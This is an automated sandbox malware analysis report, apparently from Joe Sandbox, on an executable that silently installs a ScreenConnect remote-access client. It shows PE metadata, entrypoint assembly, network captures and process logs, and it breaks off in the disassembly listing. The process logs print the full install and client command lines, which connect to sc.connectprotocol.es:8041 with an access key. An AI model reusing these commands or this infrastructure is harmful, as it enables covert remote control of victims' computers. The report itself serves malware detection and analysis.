                                                                                                            Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                            Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            call 00007FD4C0B1951Ah
                                                                                                            jmp 00007FD4C0B18FCFh
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push 00000000h
                                                                                                            call dword ptr [0040D040h]
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call dword ptr [0040D03Ch]
                                                                                                            push C0000409h
                                                                                                            call dword ptr [0040D044h]
                                                                                                            push eax
                                                                                                            call dword ptr [0040D048h]
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            sub esp, 00000324h
                                                                                                            push 00000017h
                                                                                                            call dword ptr [0040D04Ch]
                                                                                                            test eax, eax
                                                                                                            je 00007FD4C0B19157h
                                                                                                            push 00000002h
                                                                                                            pop ecx
                                                                                                            int 29h
                                                                                                            mov dword ptr [004148D8h], eax
                                                                                                            mov dword ptr [004148D4h], ecx
                                                                                                            mov dword ptr [004148D0h], edx
                                                                                                            mov dword ptr [004148CCh], ebx
                                                                                                            mov dword ptr [004148C8h], esi
                                                                                                            mov dword ptr [004148C4h], edi
                                                                                                            mov word ptr [004148F0h], ss
                                                                                                            mov word ptr [004148E4h], cs
                                                                                                            mov word ptr [004148C0h], ds
                                                                                                            mov word ptr [004148BCh], es
                                                                                                            mov word ptr [004148B8h], fs
                                                                                                            mov word ptr [004148B4h], gs
                                                                                                            pushfd
                                                                                                            pop dword ptr [004148E8h]
                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                            mov dword ptr [004148DCh], eax
                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                            mov dword ptr [004148E0h], eax
                                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                                            mov dword ptr [004148ECh], eax
                                                                                                            mov eax, dword ptr [ebp-00000324h]
                                                                                                            mov dword ptr [00414828h], 00010001h

                                                                                                            Rich Headers

                                                                                                            Programming Language:
                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                            • [IMP] VS2008 build 21022

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x15fa8
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                                                            FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                                                            FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                                                            FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                                                            FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                                            RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dllCorBindToRuntimeEx
                                                                                                            KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                                            OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 3, 2024 16:20:16.827414989 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:16.947813988 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:16.947921991 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:18.354789972 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:18.476033926 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:18.854732990 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:18.924034119 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:19.047056913 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:19.439892054 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:19.643515110 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:19.643706083 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:21.429423094 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:21.429424047 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:20:21.550570965 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:21.550616026 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:21.550626993 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:21.550745010 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:20:21.550755024 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:21:21.555677891 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:21:21.675761938 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:22:21.680867910 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:22:21.802756071 CET80414971038.69.12.167192.168.2.6
                                                                                                            Dec 3, 2024 16:23:21.805999994 CET497108041192.168.2.638.69.12.167
                                                                                                            Dec 3, 2024 16:23:21.926422119 CET80414971038.69.12.167192.168.2.6

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 3, 2024 16:20:16.657816887 CET5035753192.168.2.61.1.1.1
                                                                                                            Dec 3, 2024 16:20:16.797487020 CET53503571.1.1.1192.168.2.6

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 3, 2024 16:20:16.657816887 CET192.168.2.61.1.1.10x176dStandard query (0)sc.connectprotocol.esA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 3, 2024 16:20:16.797487020 CET1.1.1.1192.168.2.60x176dNo error (0)sc.connectprotocol.es38.69.12.167A (IP address)IN (0x0001)false

                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:10:20:09
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Users\user\Desktop\tiG6Ep202n.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\tiG6Ep202n.exe"
                                                                                                            Imagebase:0xa80000
                                                                                                            File size:5'620'136 bytes
                                                                                                            MD5 hash:E7E869ECA1D9E7FB0C7197725F3E22E5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2173892307.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2178858378.00000000068B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:10:20:09
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:10:20:10
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                            Imagebase:0x7ff73a7b0000
                                                                                                            File size:69'632 bytes
                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:10:20:11
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 C
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:10:20:11
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                            Imagebase:0x190000
                                                                                                            File size:61'440 bytes
                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:10:20:12
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61F
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:10:20:14
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:10:20:14
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=OLD-01"
                                                                                                            Imagebase:0xb50000
                                                                                                            File size:95'512 bytes
                                                                                                            MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:10:20:15
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User"
                                                                                                            Imagebase:0x7e0000
                                                                                                            File size:602'392 bytes
                                                                                                            MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:10:20:18
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                            Imagebase:0x7ff7403e0000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:10:20:18
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System"
                                                                                                            Imagebase:0x570000
                                                                                                            File size:602'392 bytes
                                                                                                            MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 01837A30 Relevance: 3.9, Strings: 3, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #!$K6$7
                                                                                                              • API String ID: 0-185628103
                                                                                                              • Opcode ID: 350d99f6a7a9971ab5c394b8270ba3cc4ed98ac4c178d01d2437fcaf3734be18
                                                                                                              • Instruction ID: ecfcbb9e7ecb8a2ec3f02c4c23e50be54d573b34aece07778c02bf1eaf15eba0
                                                                                                              • Opcode Fuzzy Hash: 350d99f6a7a9971ab5c394b8270ba3cc4ed98ac4c178d01d2437fcaf3734be18
                                                                                                              • Instruction Fuzzy Hash: 30519D713002129BC716AB6DD895E2E7BE7EBC83213588729D606CB345EF74DD468BD0
                                                                                                              Function 0183B9B0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: {Oyq^
                                                                                                              • API String ID: 0-3810077032
                                                                                                              • Opcode ID: dd904e3593595b10ee1ccf0aee6de2f50ee80b619d773296b9659b18dbf71319
                                                                                                              • Instruction ID: e23e38b23e3b5d1bc10089538828f3ceaf469a4f65af09d849a91d7b157d0853
                                                                                                              • Opcode Fuzzy Hash: dd904e3593595b10ee1ccf0aee6de2f50ee80b619d773296b9659b18dbf71319
                                                                                                              • Instruction Fuzzy Hash: AE31E2723012529BC702A77D98A0E6E3FA2EBC532134C822AC205CB341EE749D0A87E1
                                                                                                              Function 0183B9E8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: {Oyq^
                                                                                                              • API String ID: 0-3810077032
                                                                                                              • Opcode ID: 2413186cd96cdaefe0f6c49aa636a8e5e593f2049a1c94c785de4790443ce5c9
                                                                                                              • Instruction ID: ef2c8ae04eb5e23d501dc87eb1ca01a2f05c0e0166ba72104559a43f19a0e4f6
                                                                                                              • Opcode Fuzzy Hash: 2413186cd96cdaefe0f6c49aa636a8e5e593f2049a1c94c785de4790443ce5c9
                                                                                                              • Instruction Fuzzy Hash: B421D4723002079B8B06E7BD9895E2F3AE7EBD4721388822DD605CB344EE74DD0687E1
                                                                                                              Function 018341E0 Relevance: .2, Instructions: 250COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7bb82d6b63d8e77d58dd0530b756e5cb96eea328741e78ae6b52f0939501af37
                                                                                                              • Instruction ID: 27da2a86e036108b7a9af477479b425c2631b37f305ba7d6cb554b5a4c8f8860
                                                                                                              • Opcode Fuzzy Hash: 7bb82d6b63d8e77d58dd0530b756e5cb96eea328741e78ae6b52f0939501af37
                                                                                                              • Instruction Fuzzy Hash: 41A13A34B002059FDB16DB69D994A6EBBF2FBC8300B148529E906DB395DF74DD46CB80
                                                                                                              Function 018341F0 Relevance: .2, Instructions: 247COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d015a72dc9bc8b70eb84f5440c9325320f26fd71f6a25b80c61682c5284cd06f
                                                                                                              • Instruction ID: 17337df37560a2b44a12210b98cefa40dc14db4592347a5995378ea655dc9d35
                                                                                                              • Opcode Fuzzy Hash: d015a72dc9bc8b70eb84f5440c9325320f26fd71f6a25b80c61682c5284cd06f
                                                                                                              • Instruction Fuzzy Hash: FC912834B002059FDB16DB69D994A6EBBF2FBC8300B148529E906DB395EF74DD46CB80
                                                                                                              Function 01835EE0 Relevance: .2, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a90264fc795b347be82059c868eb3c14bfeafcc040f810eb5fb2649e16c2ac9d
                                                                                                              • Instruction ID: 160e945f1aa50cf01c378cce86b1efe16b999cd1baeb4f5867fe9be497f5be3a
                                                                                                              • Opcode Fuzzy Hash: a90264fc795b347be82059c868eb3c14bfeafcc040f810eb5fb2649e16c2ac9d
                                                                                                              • Instruction Fuzzy Hash: 8D914D30A0030A9BCB15DF69D85495EBBF2EF84320B288629E915EB355EB749D46CFD0
                                                                                                              Function 01838A98 Relevance: .2, Instructions: 192COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 819b50109e42facab2d47cf784504059d52e2699a554b1576fd90883f67af66d
                                                                                                              • Instruction ID: ac5db4951dcb0c1540373a45400b224f2003288527cdb2f833f662c65be39fea
                                                                                                              • Opcode Fuzzy Hash: 819b50109e42facab2d47cf784504059d52e2699a554b1576fd90883f67af66d
                                                                                                              • Instruction Fuzzy Hash: 93611674B116058FDB18DF69E894A6EB7B2FF8E314B148159E506EB325DB30ED02CB80
                                                                                                              Function 01836E68 Relevance: .2, Instructions: 188COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68f761f877c40665c1492c8c0918e6cd20ebac7c75ef087327eb7ef6bda67cc7
                                                                                                              • Instruction ID: 5f1a8d03e08ac408daa8231857c6f2f55e5aaa91d203a2b03aa68cb28f75c20a
                                                                                                              • Opcode Fuzzy Hash: 68f761f877c40665c1492c8c0918e6cd20ebac7c75ef087327eb7ef6bda67cc7
                                                                                                              • Instruction Fuzzy Hash: F7619031A002069FCB05DF68D8949AEBBF2FFC9310729866DD506EB351DB75AD06CB90
                                                                                                              Function 0183576A Relevance: .2, Instructions: 176COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
